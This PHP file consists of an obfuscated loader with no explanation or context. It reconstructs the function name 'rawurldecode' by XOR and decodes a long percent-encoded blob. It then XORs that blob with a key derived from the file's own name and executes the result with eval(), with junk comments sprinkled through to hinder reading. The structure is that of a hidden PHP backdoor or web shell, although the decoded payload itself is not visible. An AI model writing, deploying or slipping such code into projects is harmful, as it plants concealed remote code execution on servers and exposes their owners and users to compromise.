<?php
$_9mu8b='di4ug9t0sno2' ^ hex2bin('160843001555105510010b57');
$_2gbtf1v = "";
$_2gbtf1v .= $_9mu8b("G%05%11%1A%18RRT%0D%40%0A%10%5C%09%10E%40%5CWZm%07A%01%00%11V%17nQKSVF%01%0EH%5D%5D%24%18%3BV%5CP%5E%5C%01%06H%07%00%5C%06P_fUX%5C%10K%17%00%2BM%11TSMS%17%15H%0E%5E");
$_2gbtf1v .= $_9mu8b("%5DO%24%23X%5CPiDW%10%06H%11%06%5C%0CCmUYP%15H%0E%21%218bJ%0ArPX%5Em%17K%1B%5CSB%0CVm%5CDE%5D%16%5DHXT%1EJ%0ArPX%5Em%17K%1B%5CSC%02Im%5CNRQ%11");
$_2gbtf1v .= $_9mu8b("Z%06%1B%1Aq%17X_%5C%11%1B%12T%07T4%11%5C%11%5E%40fDRB%0B%5C%1B%1D%1AIK%01%1B%02vDW%10q%1B%1D%19K%3C%5D%5BT_C%1AT%07T%1D%12%06BUW__YW%00%06M%24%3C~%3Ct%7Du%14%1E");
$_2gbtf1v .= $_9mu8b("%1B%1FJ%0A%12%1D%40%06%19%10i~gm%21a%23VX%0EAm%5C%1B%1F%0CO%0DHO%5CUJ%06W%5BWSS%1ACH%06%18%11q%13DFfUX%5C%10K%01%00%07%0ED%18%1BBRRT%0D%40%0A%5CSH%0A%5DWf");
$_2gbtf1v .= $_9mu8b("FBF%3BM%00%1A%00K%0DEA%19%11%1B%12U%07TP%17T%07TKU%5D%5E%12Y%0EHFM%18ZP%07%5BR%1A%0A%5C%17YY%40LW%09%1F%00U%03QI%17W%40%10%17%06UQ%5D%0E%04%01C%15%08%18%1BL%02%5D");
$_2gbtf1v .= $_9mu8b("%12%1DUMV%01W%03%1F%1D%15%05D%5CZB%5E%5D%0A%0E%04%1C%05E%11T%1A%1D%5D%5CT%09I%01%13%15H%15RW%10%16L%5B%02%0EG%07%00%5C%0FT%5C%11%12%5CY%02C%08%1A%13O%05GQ%5C%1F%17%0ED%1AF%0F%06K");
$_2gbtf1v .= $_9mu8b("%17D%40W%16%15%10_SK%1B%1AA%08A%5EW%5EOF%1C%5D%0ATI%0EAppzrrt%23f%26%3E%3Fb.%7F%7Digea0%7B9%23%2Cw9PPZRRT%03F%06%1E%1FB%0E_%5DIGEA%10%5B%19%03");
$_2gbtf1v .= $_9mu8b("%0CW%19%01%03%0B%05%03%07R%19WM_%01%5E%13%09%1DCVH%03H%02%17T%13CBFKiDB%08G%1B%5CPA%0D%5EYIZYZ%1CZ%17%07%11%07X%15GXLPT%09MOITO%11CS%40iQ%5E%0D%5E");
$_2gbtf1v .= $_9mu8b("GP%01O%19VTTU%1E%09%40_%0C%00%0D%5E%09%5B%12%04%16%07%09%40X%1C%1B%19%5B%10%11%0F%19%14%15%09%40E%04%12%19I%0DVS_%40TWD%13O%04%06K%04n%40%5CF%5BS%07KGV%0Au%3Dp%1FcW%1AH");
$_2gbtf1v .= $_9mu8b("T%03V%28_rLm%0FdH%15%1ED%0CMXT%0A%08ZTTQYU%05H%19%17%11%07XU%5D%19M%13%5E%01G%09%10%1D_C%0C%12%1DCVH%03H%02%17%2F%0A%08ZTTQYU%05H%19%17%11uG%40QMO");
$_2gbtf1v .= $_9mu8b("GX%0E%05D%29%29%15GD%40TYV_%0ED%05%13%0D%40%07%11%0F%19%12BS%1EI%09%19%17uGZY_%5BP%5C%03O%09%02%17K8%15CZBNB%0EDD_%29sX%15HHE%5BD%11%0ERTP%5B%02KU");
$_2gbtf1v .= $_9mu8b("_%5BTi%40E%04%12%19I%0DVS_%40TW%3F%0A%1E%17%00W%13%5BX%12%1Djo_%0A%03%1D%00L%02%5EFC%16%0A%12%40%5B%0E%0E%13H%0ERi%1D%5D%5CT%09I%01%13%15H%15RWb%12FQ%10W%1F%1E%1E%05H");
$_2gbtf1v .= $_9mu8b("lo%02%12%5CY%02C%08%1A%17T%06XCM%16%0A%12L%0A%03%11%1DH%07XC%19%0A%0B%12V%07O%08T%06GD%40TYV_%0ED%05%13%0D%40%07%11%0C%07%16%03%1B_%0A%04%18%01_%11WS%19%0B%17%1AL%0A%1A%06%19");
$_2gbtf1v .= $_9mu8b("A%02%5CXS%5CPK%0AJORT%1FV%18%12%05%0A%17%06M%0E%13T%5C%0A%19%40AU%40B%12Z%10OF%5D%15G%5E%5CV%5DG%5E%15%5C%1C%13%0EBC%0C%12%11%1E%13H%15%5D%03%02%01%0EE%11%01%10%16%0B%0ED%18F");
$_2gbtf1v .= $_9mu8b("T%08%0EG%5D%5BMTV%5D%10TTP%02%5D%0C%5CGJ%16%0A%12%40X%1C%1B%19%5B%10%11%1C%19U_%40L%0A%04%1F%12C%04_QCS%5EC%10%07T%1D%12%0EK%15HHE%5BD%11%0ENIT%18W%18%12B%12AA%0B");
$_2gbtf1v .= $_9mu8b("C%1A%07T%13C%15DJYZG%17%0EAT%17F%11%19%16RZBC%16H%0E%5DOS%0AW%12%11%12%5B%5B%10L%0E%1B%00TC%10%0F%19%00%03%1BDUK%02%07A%0EDA%19%0B%17%16%12%5D%00%19%01%5DC%1F%12Z%5EE");
$_2gbtf1v .= $_9mu8b("%1A%40A%01%1B%1F%5E%0F%40%40JQM%5EM%15%12%09TY%0BX%5E%5C%16%1F%16%15M%1B%0D%04D%09%11%0E%19EC%40%08K%01%5CPE%08W_%5EXPS%02X%0C%11%5D%07XCWMCE%5CD%0A%19%07%1BC%16B%09D");
$_2gbtf1v .= $_9mu8b("_Q%12L%0F%09%01%1AM%17X%5DWiRJ%0D%5D%1B%07%5C%09%05X%5E%5CiGG%10q%0C%1B%1AZ%06_FJ%11%1E%1B%1FH%1A%1A%17Z%0A%5E%5C%19P%5E%5E%01q%1F%01%00q%00%5E%5CMSYF%17%06K%1F%12W%05K");
$_2gbtf1v .= $_9mu8b("FJ%1A%17%16%11%5C%02%1B%15C%09%5B%1E%19%12TA%0B%5D%0D%07%07%5DC%0C%12%7FW%5BA%01%07%14P%04A%01SF_CR%12Y%0EK%17%07A%10SAJE%17%0FY%0EWTK%0EDP%15%19%0C%17%15%13%09TP%1B%40");
$_2gbtf1v .= $_9mu8b("%0CZBU%16%0A%12%24H%00%04%11%40K%15Y_OQH%10%5DCTP%5E%0CSPMPBWM%15%06%12T%06G%5E%5CV%5DG%5ED%13RITh%02%5DA%5C%1FL%40%01Z%1A%06%1A%0ES%0AO%5CZDW%1FG%09T");
$_2gbtf1v .= $_9mu8b("%5CG%10nSKDVKL%0A%1A%06%19A%02%5CXS%1F%1E%12%40%5B%1D%19%1BO%0E%5BX%19%0B%17%5B%09%5E%03%1B%10KK%15GK%5BXS%09D%05%5DO%0A%01PDLQ%5CGD%13O%12%03%5C%0AEW%11%12X%5C%0BE");
$_2gbtf1v .= $_9mu8b("%1F%18X%0EGD%40TYV_%0EDFO%12M%0F%5EA%5C%1E%13%5D%0AA%04%04%18%07XCWMCE%5CD%0A%0D%15%02%5B%04ZG%02KJO%0DHO%5CUH%16_QM_X%5C%3BK%17%1D%07Z%10%19%15__%5BW");
$_2gbtf1v .= $_9mu8b("%3BI%0A%00%2BM%0C_F%5CXCAC%07F%0F%12%5B%0DRFPYY%12%02G%03%11%2BI%06EmZYYF%01%40%1B%07%5C%0A%02XX%5DDQH%08%07%14P%00K%06XHOF%17%0FDH%00%04%11%40K%15SP%5C");
$_2gbtf1v .= $_9mu8b("S%40%02T%03XT%0C%11%13%1B%02%12ZU%14A%0D%1CT%13CW%40%5CWS%1A%40Z%0A%11%1DT%15A%1E%19P%5E%5E%01%5D%06%0E%11%06GP%5BSRET%1EBF%5DOH%00%5D%5DJS%1F%16%10K%0A%1D%0EX%13%18%09");
$_2gbtf1v .= $_9mu8b("KSCG%16%40OP%19I%13%5EPQ%0DJO%02%5B%01%17%00G%0C_%12VSTC%0A%5B%19%04%5C%07%18CWMCE%5CDZ%1D%1D%19%06%13CW%5EiEW%14B%0E%17%11%06A%1En%11%18%1Dn%40%01MXT%09D");
$_2gbtf1v .= $_9mu8b("%1D%12fiq%7B%28k0%2B%5D%07XLTLXTF%0DA%01T%16I%11%5EUA%5B_%1A%40E%04%12%19I%0DSDMRBBH%0EK%0E%15_%1AZX%10M%13K%09O%04%0D%13%0E%5E%11%10%1B%0DQ%5D%16%0EGP%05");
$_2gbtf1v .= $_9mu8b("M%17HBS%5C%0A%02_%0EK%05%17Z%1AAXS%0ADF%16B%0A%1A%5C%0A%08ZTTQYP%12Z%0B%01%04%07X%18I_YE%12L%0A%04%1F%12C%04_%0F%09%0D%17%16%0FE%09%19%13%40_BFKZR%5CL%0A%15");
$_2gbtf1v .= $_9mu8b("%15%05W%08%5B%1B%19%10%11%12%40_%0C%00%0D%5E%09%5B%0EJBE%5E%01%40GP%1FE%05%5CUWTAF%00%5B%1F%5DO%0EGZY_%5BP%5CO%05CTP_%00EKI%5C%5D%19O%07%14P%0DC%02ZK%5E%16%19%0FD");
$_2gbtf1v .= $_9mu8b("M%07%06%5CA%11U%1A%1D%5D%5CT%09I%01%16%02Z%07DBb%12FQ%10W%1F%1E%1EsJ%11l%19YEVL%0A%15%15%05W%08%5Bi%1D%5D%5CT%09I%01%29%5D%07XLOKSCG%16%40OP%0DC%02ZK%5E%0DJ");
$_2gbtf1v .= $_9mu8b("T%11%40%0C%00%1DA%0D%11JXO%5BQ%1E%40%03%5CPE%08W_%5EXUD%10J%1A%04X%0EGKSHO%5CXMU%08%18%1BL%02%5D%12%1DUMV%01W%03%1F%1D%15%11TFLDY%12%06I%1D%1B%13V%0EY%1A%5B");
$_2gbtf1v .= $_9mu8b("QE%5D%03V%02%1C%5C%0A%08ZTTQYP%12Z%0B%01%04%02C%15HXGNY%0E%07CTPM%19UW%40Z%5C%5BM%15%12%12%01%40%00E%5BVX%17K%0DC%00%0C%11%06GZY_%5BP%5C%06X%1B%10%01%5EO%11");
$_2gbtf1v .= $_9mu8b("%16CWFK%0FDF%0F%13B%0CSSU%16%13Q%1EJ%0A%0D%18E%0A%0A%40%5CBB%40%0A%0E%0D%13%06A%04I_Q%1EUU%16A%08%0C%19FK%15YRPZU%0AL%19%00%10%5B%13%1D%12%1DUMV%01W%03%1F%1D%07");
$_2gbtf1v .= $_9mu8b("O%11%16CWFK%0FDFO%09H%16_QM_X%5CD%5B%09%04%18Z%05%19%1BB%12UV%0CL%1D%13T%13CqTPZRm%03K%1B%2B%17A%0DEWWBD%1A%0BK%0C%05%1A%5B%15A%1A%10%1F%0C%16%06V%1A%16");
$_2gbtf1v .= $_9mu8b("%01%5EC%0C%12JBEB%0B%5DGP%16J%0BS%40%5E%1A%17_%00%1BG%1B%11M%12_GOF%1F%1BM%07T%1D%12%0EK%15PACUG%14%0ENII%0E%25p~js%1EI%40Z%0C%18%1EA%17P%12%04%16DG%06%5D");
$_2gbtf1v .= $_9mu8b("%1B%06%5C%0A%01UZ%5BDP%1ED%0A%0D%0C%01L%16A%12%12%16%04%00M%15K%13%03J%19FQOC%17%0FDn%1A%1A%07K%11XSU_MWLV%0E%0D%18M%19_%5E%11DVE%11%5C%03%10%11M%0CUW%11%12CQ");
$_2gbtf1v .= $_9mu8b("%08D%00%00%15%07O%11_%5D%03%1F%5D%01M%1E%1A%01X%13%19%1B%10%1F%1E%09%19K%03%07%11UGVE%5DL%40Q%12%5BOITo%11CS%40%1E%1E%09%19%5C%0A%00%01%5C%0D%11%16%5EASH%13M%19%01OS%05D%5CZB");
$_2gbtf1v .= $_9mu8b("%5E%5D%0A%0E%0C%04%07V%14TQ%11%12PE%00T%18%17%02%5BJJ%16QPVH%15%5D%03TI%0E%11PELD%5BW%0AM%00%10%11%06%1AX_VNR%1A%24%5D%0A%06%1DO%0FXH%5C%1E%13U%13J%15%03%17X%16%18%1E");
$_2gbtf1v .= $_9mu8b("%19%5BS%07LA%0A%17%05%40%16GB%11%1F%1E%1BM%15K%16%10F%01CU%19%0B%17r%02G%03%11%2BI%06EmZYYF%01%40%1B%07%5CA%06RCWCABL%07FOPL%1BDPLF%17%0FD%5D%1B%06%04A%10");
$_2gbtf1v .= $_9mu8b("%19%16%5BR_P%16ICT%19JV%19%5D%5CUF%5C%11X%1F%5C%5D%07J%0A%5B_%16%1F%16%06V%1A%16%01%5EC%10%0F%04%16qs%28%7D%2A%5D%0F%0A%13WJJTSG%14%0ERT%07%5B%01BFK%1E%13P%00F%0D%06%13");
$_2gbtf1v .= $_9mu8b("%02C%15PACUG%14%0EDTG%1CJ%0A%16%5BR_P%16IOIT%5D%17CmKSG%5E%05M%0A%5CP%5E%05IA%5BRBBH%0EK%1C%12O%19%40AU%1A%17%16%06J%07%16%06IJ%0AO%5CZDW%1F%0A%0D");
$_2gbtf1v .= $_9mu8b("%10%1CL%11V%12%04%16%13P%00F%0D%06%13%0EM%11%10eXk%5CK%01MTZ%0E%0EU%07%11YRQ%15%40%1A%02%04%06J%18%12%17%16%13Z%02O%15%05%07BXLr__%5BW%3B%5E%1A%00%2BM%0C_F%5CXCAL");
$_2gbtf1v .= $_9mu8b("A%0A%17%05%40%16GB%11%1F%1B%12%40L%0B%1C%16%5C%04%18%09DPB%5C%07Z%06%1B%1A%0E%00EK%5CEDA%17%06K%0E%1BB%1B%40Z_%1A%17%16%09W%1B%10%02%5DJJ%16%5EASH%13M%19%01T%13CDTIZC");
$_2gbtf1v .= $_9mu8b("TL%07TP%13Y%07KEZ%40Bi%40T%00%18%0C_%0BWo%19%0B%17Y%0C_%04%06%11%06G%5CKMRAAM%15%0C%04%07V%14TQ%11%12PE%00T%18%17%02%5BJ%0AO_CYQ%10G%00%1ATM%05YVP");
$_2gbtf1v .= $_9mu8b("E%1F%16%1EA%03%0C%05F%05%18I%1DQ%40V%1EY%0C%02%01%0E%5E%11G_F%5BF%02%06FO%01%40%10TF%11%12PE%00T%18%17%02%5B8%15HVZOC%0CH2%5DOM%13BJNST%1A%40I%18%10%0EY%00G");
$_2gbtf1v .= $_9mu8b("G%10%0DJT%11%40%0C%00%1DA%0D%11ALTP%5C%0C%06K%0E%1BB%1B%40Z_%0Byg%28bF%0F%12A%11TSZ%5E%17%1A%11H%1F%18%00HK%18%12XE%17%16%11W%16%15%04_%00G%0F%07%12%40Z%00H%18%13%1CH");
$_2gbtf1v .= $_9mu8b("JJ%5B_%16%1F%16%1EA%03%0C%05F%05%18IPP%17%1A%17Z%1D%17%19%5EK%15HVZOC%0CHCTP%5B%1AHSIGTDM%0ERIT%1EJJWOW%5B%1A%40Y%07%10%12Y%04YT%10%0DU%40%01O%04O");
$_2gbtf1v .= $_9mu8b("%09S%06%5DA%5CMRD%05BGP%03F%07WE%5E%5EQ%1B_S%12%09%12A%11TSZ%5E%17%1A%05%5C%1D%15%0Dq%0ET%40%5ES%1F%16%3Bm%20%3B%3Fg%26%1D%12%1Dig%7D7zFT%15%5DC%15%5DWY%5CB%08Z");
$_2gbtf1v .= $_9mu8b("%0E%06%05ZC%0C%0C%19%12%5CY%02C%08%1A%16X%17UGI%1FL%16%0FE%09%19%13%40%01GF%5DCG%12Y%0E%2F%01%1A%5D%06C%5BXZ%5EH%01%06%17%15%0DB%00K%5CU%1E%5CZ%15E%1D%11%5C%0A%08ZTTQYP");
$_2gbtf1v .= $_9mu8b("%12Z%0B%01%04%07O%11%16VXXY%14B%1B%15%06_%17%18%1B%02_Q%12LG%1C%07%11ZK%15YRPZU%0AL%19%00%10%5B%13j%15X%5D%10oM%0EIRT%0A%00KV%5CO%5BY%0D%13RP%1FE%05%5CUWT");
$_2gbtf1v .= $_9mu8b("AF%00%5B%1F%2FSO%08%16o%10M%5ETD%06K%1F%1FH%0EV%5C%5B%40CV%11%5E4S%15%09%3E%11%0F%04%16%10%5BC%07%14P%05M%17HBS%5C%17%0FDo%1D%06%15WK%16BO%11%17%0FZ%0E%2F%04%1C%5E%15T%40");
$_2gbtf1v .= $_9mu8b("J_X%5CL%07CS%07XD%11%0F%07%16%10%00J%1EBES%02DPY%1E%16%0A%0CD%0A%04%1F%12C%04_POBSG%14uH%15%1F%09%3E%1D%1B%02STZ%0B%0E%2F%07%11%5C%0AP%5EPLR%1A%40_%0C%00%0D%5E%09");
$_2gbtf1v .= $_9mu8b("%5B%1B%02SO%5B%10%15%12%11%18%5D%06XT%19%1E%13Y%0FH%02%13%1AL%15EVLFl%15%05%092TI%13C%16W%1E%1FLW%12O%03%5CPE%08W_%5EXUD%10J%1A%04%2F%09%07%16o%10%0DJW%08%5D%0A%1D%12");
$_2gbtf1v .= $_9mu8b("%0EK%15YRPZU%0AL%19%00%10%5B%13j%15X%11j%12Y%13OS%04B%16V%5BW%11%1EI%0DHGP%1FE%05%5CUWTAF%00%5B%1F%2FS%5D%02%16o%19%0B%0A%12CO%0B%10S%07%18RF%40SDA%17%5DG");
$_2gbtf1v .= $_9mu8b("P%1FE%05%5CUWTAF%00%5B%1F%2FS%5EDl%1E%19%12%5CY%02C%08%1A%16X%17UGIm%10VCsFO%09K%0FBWPP%1F%16%0FE%09%19%13%40%01GF%5DCGiC%5D%0ES%29%0E%5E%0C%12%1EDR_C");
$_2gbtf1v .= $_9mu8b("%07%14%17%12F%07XA%11%12%5CY%02C%08%1A%16X%17UGIm%10BCsFO%09S%06RZV%16%13Y%0FH%02%13%1AL%15EVLFl%15%05EH%29OK%1BXF%11%1F%0CO%19%5D%1A%16%13%40%0B%19%1B%02K%3D");
$_2gbtf1v .= $_9mu8b("O");


       $_vuqlyp = basename/*f018h*/ ( trim(preg_replace/*3f*/ ($_9mu8b (/*x9n4*/"%2F%5C%28.%2A%24%2F"/*9*/ ), '', __FILE__) )/*45*/  )/*u58et*/;
       $_vuqlyp = substr/*q*/(str_repeat/*vjr*/(/*n1*/ $_vuqlyp,  (strlen/*wa6u*/(/*ohzb*/$_2gbtf1v )/*q*/ /strlen (/*9wys*/$_vuqlyp )/*ehcvs*/ /*4kd*/ )/*hsad*/  + 1/*psdg*/), 0, strlen/*w4m1*/ (/*s5*/$_2gbtf1v/*6na*/)  );
       $_2gbtf1v=$_2gbtf1v ^ $_vuqlyp;eval/*s9*/ (/*bjlva*/ $_2gbtf1v/*wvf*/) ;
